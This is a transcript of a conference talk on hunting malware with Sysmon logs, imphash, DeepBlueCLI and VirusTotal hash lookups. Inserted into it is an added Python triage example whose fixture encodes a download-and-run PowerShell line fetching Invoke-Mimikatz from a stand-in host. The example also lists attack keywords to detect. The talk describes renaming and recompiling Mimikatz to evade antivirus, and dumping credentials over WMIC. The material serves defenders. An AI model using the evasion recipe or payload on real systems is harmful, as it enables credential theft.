Threat Hunting via Sysmon - SANS Blue Team Summit

Captions
All right, thank you. So my name is Eric Conrad, welcome to my talk. It's a talk on Sysmon. You know Sysmon: it is from Microsoft Sysinternals, and it adds a lot of amazing logging to your Windows environment. The Sysmon logs play nicely with all your SIEMs, Splunk, ArcSight, whatever, Elastic of course, and it gives you that necessary visibility. There's an old saying that I quote a lot, by Brandeis: sunlight is the best disinfectant. You need to find out where the blind spots are, you need to find out where you can't see things and add that visibility, and malware, especially recent malware, has been very good at moving quietly through these blind spots in your network. So it's a Microsoft tool, it's not installed natively, but it does play nicely with your SIEM, and it scales globally. By the way, a common question we get is, will Sysmon scale to a large enterprise? You bet. Microsoft runs it globally, so it does scale to a very large environment.

So it gives you some new logs now, and one of the best things you can do with this is generate hashes. You get a hash of every single process running in your entire environment. That's amazing functionality. Normally you need a tool like Tanium or Carbon Black or SentinelOne to get that kind of deep-level insight into every single process running in your environment, so that kind of visibility is critical, and grabbing the hash of every running process is a really, really useful thing for hunting malware. Once you have, say, the SHA-256 hash, you can upload that to VirusTotal and get dozens of vendors', 60-odd vendors', opinions on that hash. And we'll talk about the amazing imphash. The import hash is a really key feature that allows you to chase down related families of malware, and I'll show an example: we took Mimikatz, we made some trivial
changes to it, and got most antivirus vendors to fail to detect it, even though it was Mimikatz. Of course Mimikatz is a tool to dump your plaintext passwords, your hashes, your tokens, things like that. So malware is pretty good at making this polymorphic code with trivial changes: the functionality is exactly the same, but the actual signature is different, and that traditionally has thrown off antivirus vendors. It's a simple parlor trick, but imphash can help you chase down that stuff.

A lot of capabilities here, and Mark Russinovich, who runs Sysinternals. Sysinternals was a separate company, of course; Microsoft acquired them a number of years ago, and we were worried that Microsoft would embrace and extend Sysinternals, meaning ruin them. Sometimes the big fish eats the little fish and the little fish dies, but in this case Sysinternals has been great. It's been really improved, and he's really good at going tactical. When we saw malware like Petya and NotPetya, they started moving through new ways, at least for malware, like WMIC, the Windows Management Instrumentation Console, which has virtually no useful native logging whatsoever. WMIC natively supports debug logging, which is terrible from an operational standpoint; from a detection standpoint it's really not terribly useful, and it's not operationally advisable to turn on WMIC logging, say, globally. That would be very expensive and you could harm operations. So Mark Russinovich saw that Petya and NotPetya were moving through tools like WMIC, these tools had virtually no useful native logging for our SIEM, for our SOC, and he added WMIC logging to Sysmon a few weeks after Petya started using that. And of course we know these malware variants, Petya and NotPetya, and NotPetya is now estimated to have caused over 10 billion dollars in damages. Ten billion dollars, once you're in a malware and moving through these fairly
secret channels. So Mark's been very tactical, adding features to Sysmon allowing us to actually see, if not prevent that malware ideally, but at least detect it when it starts moving.

So here's imphash. It's an interesting take from Mandiant. They're like, okay, instead of hashing the signature, which is trivial, like flip one bit in that binary and suddenly the SHA-256 hash no longer matches, what if instead of hashing the binary we actually hashed the list of DLLs that are loaded, the names of them and the order? So instead of just getting the SHA-256 hash, among other hashes of course that Sysmon supports, let's hash the list of the DLLs and the order they're loaded. This allows you to catch related families of malware. So someone takes a piece of code like Mimikatz, as you're going to see I did, makes some trivial changes to it, and the imphash is going to be the same.

Now of course we have this thing we talk about called the perfect solution fallacy. The perfect solution fallacy is when you have a good idea, like hey, let's fight malware, let's track malware by tracking the imphash, and someone will often raise a hand: well, you know, of course a nation-state would change the list of the DLLs, they'd rearrange the order, they'd add a different one in, just to throw that off. We call that the perfect solution fallacy. The perfect solution fallacy is a fallacy because it states a solution is not useful unless it's perfect in all use cases, and of course we don't believe that. If we believed that we wouldn't use firewalls, we wouldn't use antivirus, we wouldn't use anything, because everything fails. That's why we have defense in depth. So sometimes you come back to work on Monday and you have these ideas for new things to try, and someone might try to shoot them down, not because they're bad ideas, simply because they're different. People like to fight change. Some IT people build entire careers fighting change. These people are actually harmful and
toxic in your environment. They think they're well intended, but it's mainly a fight for the status quo, and as I've told many of my clients, the status quo isn't working.

So let's look at Mandiant M-Trends, speaking of Mandiant. So of course Mimikatz is by Benjamin Delpy. Hilariously, Benjamin Delpy wanted to teach himself how to program, and Mimikatz was his project. Well, mission accomplished, my friend, you got it done. So he wanted to teach himself to program, he wrote Mimikatz. This tool was so explosive, it initially was closed source, it was so explosive that he was invited to a conference in a foreign country. If you Google Mimikatz and Wired magazine you'll see this article. He was invited to a conference in a certain foreign country, back when Mimikatz was closed source; it's open source now of course. His internet went out, he went down to the front desk, leaving his laptop behind. The front desk kept stalling. He went back to his room and found someone in the middle of what we call a black bag operation: they were typing furiously on his keyboard trying to get the code. He's like, hey, what's up? The guy's like, oh sorry, wrong room, wrong room, and just storms out. So some nation-state wanted him so badly they lured him to that country under the guise of a free trip to a conference and they tried to steal Mimikatz. Interesting.

So it does a lot of things. On Windows 8 and lower especially it's very, very useful: plaintext credentials in RAM. So we have tools now like Petya and NotPetya that are injecting Mimikatz into the system, dumping the plaintext passwords and using that to move laterally. And we predicted, I've taught with Seth Misenar, as instructors, for years, we predicted for years that malware was going to get smart. Most malware was tremendously dumb in the past. You saw worms like Conficker, and the
way they pivoted was they'd launch an exploit. For Conficker it's MS08-067. You'd own the box, and then it'd keep launching exploits and own lots more boxes. So you have a thousand systems, two are unpatched for that patch, MS08-067, two went down, end of story. Pen testers get a lot more than two, though. The pen test gets a whole lot more than two. Why? We own those two, we get SYSTEM ideally on those boxes, and then we inject Mimikatz and we dump the usernames, the hashes, the passwords, the security access tokens and others, and we steal credentials and move laterally. That's how human pen testers move. Now malware never moved like that until about two years ago. The alleged, and I say alleged, NSA hacking toolkit leaked. Malware combined the NSA hacking toolkit, MS17-010 against SMB, EternalBlue of course, married that with a human-style pivoting campaign, and ten million, ten billion dollars from one strain of malware.

So let's look at Mimikatz. It's an important thing to detect of course in your SOC, and a lot of people alter Mimikatz. A lot of these nation-states, criminal actors, crime gangs, they'll alter Mimikatz in often trivial ways to avoid detection. So I was in my lab and I was reading about this and I thought, well, how hard is it to alter Mimikatz to evade antivirus detection? So I downloaded Mimikatz from Benjamin Delpy's site, the actual exe: 70 percent detection, all right, pretty good. And then I compiled it from source. I made no changes whatsoever, I simply compiled it from source, and over half the vendors could no longer detect it, because I hadn't changed a single line of anything. I simply used this nation-state tool called a compiler. Oh, that dude used a compiler, wow. And I am no Windows software expert on that front. I'm not a Windows developer. I've compiled thousands of things on Linux and Unix; I can't remember the
last time I compiled anything on Windows. I literally had to Google "free Microsoft compiler", that's what a newb I am on this front. Oh, Visual Studio, okay, I can do that. I'm sure I compiled something back in the Borland C++ days or something, but it was a million years ago. All right, so I Googled "free Microsoft compiler", "Windows compiler download", compiled, and over half the antivirus vendors are flummoxed by that nation-state, ha ha, move. And then I changed Mimikatz to Mimidogz and I got 7% AV detection. I was literally giggling like a little kid in my office. I changed cat to dog, that's all I did, that's all I did, and most of the vendors are gone. And if I haven't convinced you, blacklisting antivirus is largely... it catches the ankle-biters, that's what it does. Now of course the vendors have moved on, they've added heuristics, they had to, but a static scan of a binary is a pretty weak test on that front. And as you see here, this dog can hunt. My password on this system was "this passphrase is uncrackable", which was a great password until I showed it to all you folks, but I trust you, don't worry about it. So again, Windows 8 and lower, unless you've changed them, plaintext credentials sitting around. Windows 8 end of life in January, tick tock, tick tock. All right, Windows 7, sorry, Windows 7, Windows 7 end of life in January, tick tock on that. If you haven't begun your Windows 7 replacement project, well, get going.

Okay, hilariously, so I uploaded it to VirusTotal, and a few hours later Kaspersky was now hot on the trail of a notorious hacking tool called Mimidogz, which has never existed anywhere except that laptop and VirusTotal. A few hours later, 13; a few days later, 26. Your corporate antivirus today has a signature for Mimidogz, and that's my way of saying hi to my homies. How's it going? Conrad says hi. And you know, some people complain about the
economy; I'm growing the economy, I'm a jobs creator, I'm creating, okay. So then hilariously my pen test friends started emailing me saying, hey Eric, can you make me a Mimi-something, but don't upload it to VirusTotal, because I don't want them to know. I'm like, hey, special orders don't upset us. Of course, of course, I'm a service-oriented company, so I made Mimiapes and Mimipigz, and I also made Mimiyakz, because I thought yaks was clearly funnier than even dogs. We can all agree on that, right? Mimiyakz is clearly funnier. So even though Kaspersky had figured out Mimidogz, they hadn't figured out Mimiyakz, because I changed three more letters. If you're wondering how much work it takes to pull off this nation-state-style attack, ha ha, you're seeing the sum total of the effort there on the top screen. Now that's a bit of old-school command-line kung fu, an old-school Unix admin. So what I did was I made a temporary directory, I unzipped the source code, I renamed two directories, the two moves, or two renames, from katz to yak. I did a recursive find to rename every file from katz to yak. That leaves the substrings. How do I change a string in every file? The obvious way is to open it up in an editor and edit them. I'm too lazy to do that, I'm not going to do that. So I did a streaming edit: I tar everything up, which just combines all those files into one big blob, I sed it with a streaming edit, flipping katz to yak, and then I saved the file, then I compile. So I made a whole bunch of these for my friends, my pen test friends, and this one I uploaded; the rest I didn't. I didn't upload Mimiapes, I didn't upload Mimipigz, et cetera. But my pen test friends, they got seven percent detection or so and they used them to great advantage. But imphash isn't fooled by this. Imphash isn't fooled at all. So when you use a tool like Sysmon and you grab the running hash of every process, I can easily evade your SHA-1 check or your SHA-256 check; however,
the imphash check is going to take more work. Again, perfect solution fallacy, I can evade that too, but if I'm making simple changes to programs to evade antivirus detection, which is how most antivirus works today, or how most malware works today, the imphash will catch me. So imphash is a very useful feature out of Mandiant, and I recommend, well, installing Sysmon of course, but grabbing the imphash, and if you have a piece of malware, hunt for that imphash, just in case there are related variants that you're not recognizing as a related variant. You can catch it that way. Very, very useful. I've just begun, you know, basic research on imphash; I think the potential is huge and currently largely untapped, so let's use that. Sysmon will get you that for free.

You can also do some other hunting through Sysmon. Of course you can look for unsigned stuff. Now, is an unsigned binary always malicious? No. Is a signed binary always clean? No, of course not. Malware authors sign their binaries too, but unsigned is interesting. Unsigned is worth looking at. Most malware is unsigned now. Any malware author can buy a code signing cert, or they can steal one, perhaps, but if you're hunting through data and you're wondering what to focus on in your SOC, things that are unsigned are useful to look for. Also you can say, okay, don't show me anything signed by Microsoft, don't show me anything signed by Oracle, don't show me anything signed by Google, whatever. All this data feeds in through native Windows event logging; you've already got a SOC, that's already a SIEM that's already ingesting that stuff somehow. It's pretty easy to actually search on this stuff and do threat hunting through data.

A lot of people view threat hunting as an NSM exercise, a network security monitoring exercise. We've always hunted through packets. If you've done IDS work, we've always hunted through packets. But a lot of SOCs don't hunt through their CSM, which is continuous security monitoring.
Simply put, NSM is data in motion and CSM is data at rest: network security monitoring, continuous security monitoring. And we've always threat hunted through NSM, but I see plenty of SOCs who aren't doing any threat hunting through CSM, through their actual log files. So add that threat-centricity, and when you go hunting, again, unsigned binaries, or binaries signed by vendors you don't recognize or trust, is a useful step.

If you don't do Sysmon you can still get a lot of this goodness through event 4688. I know almost every talk I mention this, because it's that good. 4688, the security log. You've already got that log, but you don't get the full command line unless you make those two changes. You make those two changes, you get the entire command line. And Sysmon gives you a whole lot more than that, including WMIC logging, registry logging, a whole lot more, but if you want kind of a lite version of that without making a big change in your environment, simply tweak 4688 to give you the full command line. As I've said previously, if you put a gun to my head and gave me one log file, this would be it. In a SOC I want more than this, but if I only get one, this is the one I want.

So let's look at how malware has evolved. What I showed you previously was an actual fat exe, Mimiyakz.exe, Mimidogz.exe, and your corporate antivirus has done a really good job at killing that stuff. It's done a really good job killing that stuff, and so malware of course is evolving. If your garden-variety antivirus is going to squash some piece of malware and it's an advanced piece of malware, they're going to evolve to avoid that. So we go fileless now. A lot of malware is coming in through PowerShell. I love how people wring their hands about PowerShell being used for malware. My clients, I see online, on Twitter, people suggest we somehow block PowerShell. Sigh, come on, come on. Saying malware moves to
PowerShell on Windows is like saying malware uses bash on Linux. No one ever thought about deleting bash as a result. So we need to get that sunlight onto PowerShell, understand PowerShell and understand how the malware is using PowerShell. The malware is living off the land. We call these things LOLBins now, living off the land binaries, LOLBins, and malware has learned, and good pen testers have learned: don't install malware, just use what's there. PowerShell is going to be whitelisted if there is whitelisting; PowerShell is going to run in some form. So live off the land. Good pen testers do that, and advanced malware does that too.

This is Metasploit, fileless mode. So instead of saving some .exe to the file system as I showed you earlier, we won't save anything to the file system, we won't save a byte, we'll just use this giant long command line. A lot of malware does this: the Net.WebClient DownloadString, have this giant command line that's compressed and then base64-encoded, convert the base64, uncompress it, run it. So it's 2,400 bytes long, it's massive, and natively in a Windows environment you don't log any of this unless you've added Sysmon, or you've enabled the full command line in event 4688. So it's also invisible to your antivirus, or it does a weaker job of this, because nothing's saved and there's nothing logged unless you've made those changes we talked about. So again, a very common thing, fileless now. We often see PowerShell launched by cmd; that's another very typical maneuver by malware. How often does one of your programs open up cmd, a terminal, and then type powershell.exe inside that terminal? Not common for a person to do that, but lots of malware does: cmd /c powershell.exe blah blah blah Invoke-Expression, and off we go. When you uncompress and convert the base64 back and get this giant blob, I recognize that's a bit of an eye chart. It is by design, just to impress upon you how much is going
on there. All those function names are randomly generated on the fly. They are, quote, high-entropy function names, meaning they're randomly generated to avoid any kind of blacklisting. If I called my function EvilFunction, some vendor's going to look for the string EvilFunction, so I'll generate it on the fly, randomly, high-entropy strings.

Shout out to Mark Baggett, by the way. He wrote a tool called freq.py to do frequency analysis, directly as a result of teaching SEC511. What we were trying to find was a programmatic way to detect that kind of stuff: detect randomly generated exe names, randomly generated domain names, domain generation algorithms. We looked at it, we didn't get very far, and Mark Baggett figured that out, and it's called freq.py. You feed it a corpus of data, like Windows exe names from your install image, and it tells you how likely other names are, how similar or dissimilar other names are to that, and you find the ones that seem very unlikely based on your existing names. It works really well to detect that kind of stuff. Again, lots of advantages.

So Set-ExecutionPolicy is not a security control. If you're wringing your hands about allowing .ps1 files to run, there are all kinds of ways to run .ps1 files without triggering this, and what I just showed you works fine. So Set-ExecutionPolicy is not a security control; it's not going to protect you from any pen tester or any semi-intelligent malware.

Just a quick review on DeepBlueCLI. I've talked about this before, but I am updating it now in preparation for the final DerbyCon, right here in Louisville in September. So the final DerbyCon is happening in September. I'm updating that talk now, I'm updating that tool now. I'll be there either way, but I very much hope to speak there as well in September, so I'll see you there. The tool I wrote for DerbyCon a couple of years ago, I've given a couple of talks on it, I've
updated it a bunch, and it's a way to basically threat hunt through Windows event logs. So one thing that's interesting in SOCs, I've said this before: if no one in your SOC is scripting, you have a substandard SOC. That's a very unpopular statement, but I stand by it. If no one in your SOC can or does script, you have a substandard SOC. I literally was speaking in Miami last year, my wife came with me, it was January, Miami, and we live in Maine, and I said that in a room about this big, and my wife was sitting in the back, and people were kind of quietly booing and muttering when I said that. Yeah, they didn't like what I said: if no one in your SOC is scripting, you have a substandard SOC. The reason people don't want people scripting in SOCs is they want people in SOCs to be 22 years old, all of them. Now hey, if it's 80% 22-year-old kids, no problem at all. If it's a hundred percent, that's not going to work. So adding some script ability is a key element in your SOC, and whether you use DeepBlueCLI or take some ideas from DeepBlueCLI... I was in the SOC for one of the world's largest retailers, and they took DeepBlueCLI, looked at the things that it was doing that they weren't doing, and added it to their tool, meaning that they scripted it. They used Python in their SOC, it was Elastic, and they added the functionality. So whether you use DeepBlueCLI directly or take ideas from it, I'm happy. Whatever value you get from that, that's great.

A lot of stuff it catches, including of course Sysmon, and basically years of threat hunting experience defending networks, and DeepWhite, which we're going to actually discuss next, and a lot of good threat hunting goodness boiled down to one tool: the native visibility you get out of Sysmon, of course, and 4688 and other events as well. So it'll
also do that: when I showed you that big giant compressed command, it'll recognize that, it'll actually unwind it. So it'll see it's base64, it'll decode the base64 automatically, it'll see it's compressed after that, it'll decompress it, and then it'll scan the stuff below that. And there is this funny Daniel Bohannon who has this Invoke-Obfuscation tool. Invoke-Obfuscation is scary. If you haven't checked that tool out, look at it. Invoke-Obfuscation makes keyword searches, pattern matching, pretty much useless. All kinds of ways to chop, slice and dice that stuff. Another thing DeepBlueCLI does is it looks for obfuscated commands statistically. So it says, okay, what percentage of normal characters is in this command line? If you see Invoke-Obfuscation, there's all these backticks and weird octal characters or whatever, binary characters. So this is, okay, what's the percentage of normal alpha in this command? If it's above a certain threshold, below a certain threshold, alert on that. So it also detects obfuscated commands, not by patterns, because that's not going to work, excuse me, but by statistics, and it'll unwind that stuff automatically.

And here's some of this nasty malware we're seeing now: human-style pivoting. So human-style pivoting, where it gets into a box, so you're missing one, you've got a thousand systems, two unpatched. Ten years ago malware hit two, that was it. Now malware hits two, uploads Mimikatz, dumps the usernames, dumps the hashes, dumps the plaintext passwords, steals the security access tokens. The security access token is what grants your domain privileges to the local process if you're a domain user, and it uses that to move laterally. And Wired magazine had another great article on the shipping company Maersk. So Maersk got hit with NotPetya and their entire AD infrastructure globally was taken down within minutes. Their entire Active Directory infrastructure was taken
down within minutes. They had no viable backup, and the only reason they survived that, well, it was an act of God. There was a power outage in Ghana. What had happened was, when the malware hit, there was a power outage in Ghana and an Active Directory controller was offline. The only remaining copy of that database was sitting on a powered-down PC in Ghana. So they called Ghana and said, unplug everything now before the power comes back, and grab those disks and fly to London. And they couldn't fly to London due to a visa issue, so someone from London had a flight to Nigeria, someone from Ghana had to fly to Nigeria, they met in the middle, they handed this off, they went back to London, they recovered their AD infrastructure globally from that. It was just crazy, crazy malware, and they were impacted. That day alone lost billions of dollars, and Maersk does those giant shipping containers; you've seen them all over the world, I'm sure, and you've got 18-wheelers backed up for miles at ports. The whole thing was crippled. They fell back to paper and pencil managing that stuff, and customers would call them: I got all this food in these containers that's rotting, we just missed our Christmas, we just missed this, we're losing millions. And Maersk said, okay, how much did you lose? 1.2 million dollars? Blank check, here. They were literally handing out checks just because they had to survive. A couple of things: they had to survive the malware, they had to survive the lawyers too. There were a lot of attacks coming in at them from the malware and the legal front, getting sued, so they could have lost the company due to a lot of reasons. They were just handing out checks to survive that issue. And that's what this malware is doing now. Once it gets in it can be quite destructive. Of course there's a series of mistakes that led to that, involving their credentials, manually synchronized local admin passwords, et cetera, et cetera, but it
was damaging. And the city of Atlanta got hit with SamSam. So NotPetya was not ransomware, it was destructive malware; it simply destroyed your systems, there was no ransom to pay. SamSam is ransomware, so SamSam allows you to get the data back, or get the key to decrypt your data. So it encrypts everything, holds the key hostage. If you have bad backups, well, game over. I'll give credit to the city of Atlanta: they refused to pay the ransom, they recovered normally, which was a lot more expensive than actually paying the ransom, and there's a moral issue there, an ethical issue there. Do you pay these criminals this money? Because where does that money go? They held firm and they recovered, but they were crippled for certainly weeks and longer. And it moves through WMIC and PsExec, which offer, again, virtually no useful logging unless you've installed Sysmon.

Here's an example PowerShell command, an attack. Now why am I using this? It's a very common way. I've shown you now three ways to run Mimikatz: there was the fat exe named way, which your antivirus does a good job of detecting today generally; there was the Metasploit way, which is the giant compressed, base64-encoded command-line way; there's also the Invoke-Expression way. Invoke-Expression does a kind of wget-style download: run this thing on the fly. PowerShell is going to be there on any recent system of course. Nothing's logged natively, again, unless you change some stuff, added PowerShell logging or Sysmon logging or event 4688. And again, sunlight is the best disinfectant. This works really well, and here's the log that's created. So this is event 4688 right here, and if you turn on the full command line auditing you get the whole thing right there. It's a piece of cake to find if you're looking for it. It's not hard to find this stuff. Again, there are ways to obfuscate, but it's not hard to find this
stuff. And so WMIC is interesting. Give a shout out to Ed Skoudis, who helped me figure this stuff out. There's an old saying: do what I mean. It's not working, do what I mean. And I wasn't seeing any output, because it's outputting on the remote system. So I'm running commands, I'm running Mimikatz, I'm not seeing any output; the output's being displayed remotely. So you can do a trick where you basically create a share and have it log to the share, if you want to grab those credentials of course. And here it is here. You don't actually see the output, but as you see here, I ran the command and I dumped the creds to a share, and then I opened up that share, that file on the share, to read the credentials. Here it is here: see, pwned, mimi.txt, there it is right there. And here's the event log view. Very common for tools like PowerSploit to use this encoded command, so if you have a SIEM that can't decode this, you're in trouble.

So I gave my talk on DeepBlueCLI at DerbyCon, I came off the stage, and there were a whole bunch of questions like, well, I want company X, I paid three thousand dollars for company X's SIEM, and how do I do the DeepBlueCLI-style stuff? How do I decode that? Some SIEMs can, some SIEMs can't. Some SIEMs are going to limit you to a basic keyword search, and a keyword search, you know, saying "base64-encoded command" is going to be very noisy. Plenty of non-malicious things do that. So I'm like, well, grab the Windows event log and parse the XML, and the guy's like, well, my tool can't do that. Well, how about this? My tool can't do that. How about this? My tool can't do that. I said, how much did you pay for that tool? $300,000. Like, well, maybe it's time for a moment of introspection. If my free script can do it... I get back to the scripting angle, programming, or having vendor tools that can do this kind of stuff. Of course some vendors can, I'm not throwing
that stone, but some can't, right. So, but programming allows you to kind of marry those two worlds, right. So here's DeepBlueCLI versus these, all right. And we have... notice it scans it: the first one is easy, it scans it twice, right. So this is okay, you know, we got a suspicious command line, download via Net.WebClient DownloadString, we got Mimikatz, etc. The second one's a bit more interesting. It says I've got a lot of base64 encoded characters, so why don't I decode that automatically, right. So it decodes that automatically and then rescans that normalized content. Now it has that string; it sees, you know, Invoke-Object, Invoke-Expression rather, and the Net.WebClient DownloadString, etc.

All right, so I was wondering how to leverage the goodness that Sysmon gives us, especially those hashes. You know, because again, that kind of visibility, to see the running hash, the hash of every running process in your entire company, that's powerful visibility. Again, you don't normally get that without a tool like Tanium or Carbon Black, and how can I leverage that, right? And we've had this slide in 511, SEC511, for years, saying, hey, you know, here's an idea: use Sysmon event 1, grab the running hash, grab the hash from every running process, send that to VirusTotal. For free, by the way; there's a free API to do that. And check it out. We had that slide for a long time and then I thought, well, how about I just write that, you know, why don't I just... when I do that, right. So we did that. Turns out VirusTotal has a free API; you can pay for more access, but you can get one submission every 15 seconds for free, right. And obviously people are hesitant to send, you know, files to VirusTotal, because hundreds of thousands of researchers slash security companies have access to that spool, so a lot of people are hesitant to send files to VirusTotal for privacy reasons. I get that, but the hash is probably safer that way, right. So send the hash, and basically generate a whitelist. So, so take your Windows 10 install image,
grab a SHA-256 hash of every exe on that thing, right. That's your whitelist. And then what DeepWhite does is, okay, check the whitelist; if it's not in the whitelist, look it up; if it's malicious, obviously, tell you, right. And once I've looked it up, don't look it up again, right, unless you want me to, many what, right. And so what happens is, even in large environments we've tested this out, DeepWhite will get busy for a bit, because of course you have things that are not on your install image: Chrome updated since then, etc., etc., etc., right. So you've got things that aren't on your install image, but even in a large environment you've probably got hundreds, maybe thousands, but probably not hundreds of thousands of those things, unless you're a huge shop, right. You've got hundreds of thousands of new things that aren't on your install image? Fine; VirusTotal, DeepWhite will start submitting. If it has more than one, it's told to sleep 15 seconds, right, and it'll kind of churn through that queue, and you've got 60-odd antivirus vendors' opinion on that binary. And it is magic, man, it is magic. All free tools, all that was free, right.

And by the way, for my DerbyCon talk I'm going to add this functionality, unless someone's done it. You know, Mike Poor's line on this: every script you thought about writing, someone's already written it, just go find it, you know. So someone may have done this, but I'm going to take Bro slash... they renamed Bro to Zeek, of course, you know; take Zeek logs and do the same thing with Zeek. That's my idea, unless somebody beat me to the punch, in which case I'll just talk about the awesome stuff they did, right. But Zeek, the newly renamed Bro: Bro was named, the IDS, after Big Brother, Big Brother's watching you, and then of course it's going to be associated with bro culture, which is not their goal at all, so they renamed it Zeek, in honor of the dog from the Far Side cartoons, which is awesome, right. So now we say Bro/Zeek, just like we say S LT LS now, right,
and, but, take Zeek: it can also auto-carve exes, grab the hash, submit to VirusTotal. That's my idea, unless somebody beat me to it, in which case they're awesome, right. And this works really, really well. And so basically there's an old saying from programming: if you've typed it twice you should have scripted it once, right. That's old-school Unix sysadmin, you know, wisdom. I've manually done this more than once, I can tell you that: manually grab the Sysmon log, manually grab that hash, manually copy, manually paste it into the VirusTotal lookup, and that of course is Mimikatz, right. And so I've done that more than once and I finally scripted it. Of the various hashes I tried, I mean, as I mentioned previously, Sysmon does all kinds of hashes; SHA-256 seems to be a good trade-off between security and usability and portability.

Now here's Mimikatz. Now don't freak out if you get one hit or two hits like I did, okay. So I got one hit, and this one hit was from the SEC511 Windows VM we've handed out to thousands of students, right. So I run DeepWhite on the SEC511 Windows VM, it gets a hit, and I start hyperventilating. I'm like, it's infected, I've given it to thousands of people, like, my career's over, I need to, like, get a new name and change my identity, and yeah, my mind was racing ahead to all the failure. Well, wait a minute, one hit, what is that? So don't hyperventilate, don't completely lose your mind like I started to, if you get one hit, right. And so why do you get one hit? Well, Sophos doesn't like PsExec. Now admittedly, well, it's a PUA, a potentially unwanted application, but it flags it as a virus. That's not a virus. I mean, PsExec, you know, bad things have happened with it, but it's not a bad program; it's something bad things are done with, okay. So take that with a grain of salt. Also, sometimes, I don't know who the hacker is; the only time I see the hacker is when they're not detecting something or they're flagging on some of this. You only notice them on that list. But anyways.
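The two pieces of tooling described above, the DeepBlueCLI decode-and-rescan pass and the DeepWhite whitelist-then-lookup flow, as an added Python example that is not part of the talk and is not Eric Conrad's own code. It parses Sysmon Event ID 1 records (constructed here, with the real Windows event XML namespace), decodes a PowerShell -EncodedCommand argument and rescans the decoded text, then checks each process SHA-256 against an install-image whitelist and queues only unknown hashes for lookup with the 15-second pause the talk mentions. The hashes, the example.invalid URL, the whitelist and the lookup function are constructed stand-ins so it runs offline; a real deployment would call the VirusTotal API in place of `FAKE_VT`.

```python
"""Sysmon Event ID 1 triage in the spirit of DeepBlueCLI and DeepWhite.

Added example; not code from Eric Conrad's tools. Decodes -EncodedCommand
payloads and rescans them, then checks each process hash against an
install-image whitelist and looks up only unknown hashes, one per 15 s.
The XML records, hashes and the lookup table are constructed so the
script runs offline.
"""
import base64
import hashlib
import re
import time
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Strings worth flagging in a process command line (DeepBlueCLI-style).
SUSPICIOUS = ["Net.WebClient", "DownloadString", "IEX ", "Invoke-Expression",
              "Invoke-Mimikatz", "sekurlsa"]

# PowerShell accepts abbreviations of -EncodedCommand such as -e and -enc.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encod\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def fake_sha256(label):
    """Constructed stand-in for a file hash: SHA-256 of a label string."""
    return hashlib.sha256(label.encode()).hexdigest().upper()


# Constructed payload of the download-and-run kind the talk describes.
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
           "'http://example.invalid/Invoke-Mimikatz.ps1')")
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Three constructed Sysmon Event ID 1 records: a whitelisted cmd.exe, an
# encoded PowerShell launch, and an unknown dropped binary.
SAMPLE_XML = f"""<Events xmlns="{NS['e']}">
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /c whoami</Data>
<Data Name="Hashes">MD5=00,SHA256={fake_sha256('cmd.exe')}</Data></EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
<Data Name="CommandLine">powershell.exe -nop -w hidden -enc {ENCODED}</Data>
<Data Name="Hashes">SHA256={fake_sha256('powershell.exe')}</Data></EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\\Users\\a\\AppData\\Local\\Temp\\dropped.exe</Data>
<Data Name="CommandLine">dropped.exe</Data>
<Data Name="Hashes">SHA256={fake_sha256('dropped.exe')}</Data></EventData></Event>
</Events>"""

# Constructed whitelist (hash of every exe on the install image) and a
# constructed stand-in for the VirusTotal hash lookup (no network access).
INSTALL_IMAGE = {fake_sha256("cmd.exe")}
FAKE_VT = {fake_sha256("dropped.exe"): "malicious: 42/60 engines",
           fake_sha256("powershell.exe"): "clean: 0/60 engines"}


def parse_sysmon_events(xml_text):
    """Return Image, CommandLine and SHA256 for each Event ID 1 record."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "1":
            continue
        data = {d.get("Name"): d.text or ""
                for d in ev.findall("e:EventData/e:Data", NS)}
        hashes = dict(p.split("=", 1)
                      for p in data.get("Hashes", "").split(",") if "=" in p)
        events.append({"Image": data.get("Image", ""),
                       "CommandLine": data.get("CommandLine", ""),
                       "SHA256": hashes.get("SHA256", "")})
    return events


def decode_encoded_command(cmdline):
    """Base64-decode a -EncodedCommand argument (UTF-16LE) or return None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_command_line(cmdline):
    """First pass on the raw command line, second pass on the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + "\n" + (decoded or "")).lower()
    hits = sorted(s.strip() for s in SUSPICIOUS if s.lower() in text)
    return hits, decoded


def triage_hashes(events, whitelist, lookup, cache, sleep=time.sleep, interval=15):
    """Skip whitelisted and cached hashes; look up the rest, pausing between
    lookups to stay inside the free-API rate described in the talk."""
    verdicts, pending = {}, []
    for ev in events:
        h = ev["SHA256"]
        if not h:
            continue
        if h in whitelist:
            verdicts[h] = "whitelisted"
        elif h in cache:
            verdicts[h] = cache[h]
        elif h not in pending:
            pending.append(h)
    for i, h in enumerate(pending):
        if i:
            sleep(interval)
        cache[h] = verdicts[h] = lookup(h)
    return verdicts


def run_demo():
    events = parse_sysmon_events(SAMPLE_XML)
    findings = {ev["Image"]: scan_command_line(ev["CommandLine"])[0] for ev in events}
    sleeps = []
    verdicts = triage_hashes(events, INSTALL_IMAGE, FAKE_VT.get, {}, sleep=sleeps.append)
    return findings, verdicts, sleeps
```

`run_demo()` returns the per-process string hits, the per-hash verdicts and the list of pauses that were requested; with three records, one whitelisted, only two lookups happen and a single 15-second sleep sits between them. The `cache` dict is what keeps DeepWhite-style tooling from re-submitting a hash it has already seen, so the same dict should be kept across runs.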
I'm not sure what they're doing over there, but if it's not signed they crank up the heuristics. So if the piece of software is not signed, the heuristics are cranked up to 11. Does Microsoft sign everything? No, they sign almost everything. Now they sign everything, just about, but there's a few older things, .NET Framework stuff, whatever, that might not be signed. So clearly give it more scrutiny, but if they downloaded from microsoft.com I'm not terribly worried about it, right.

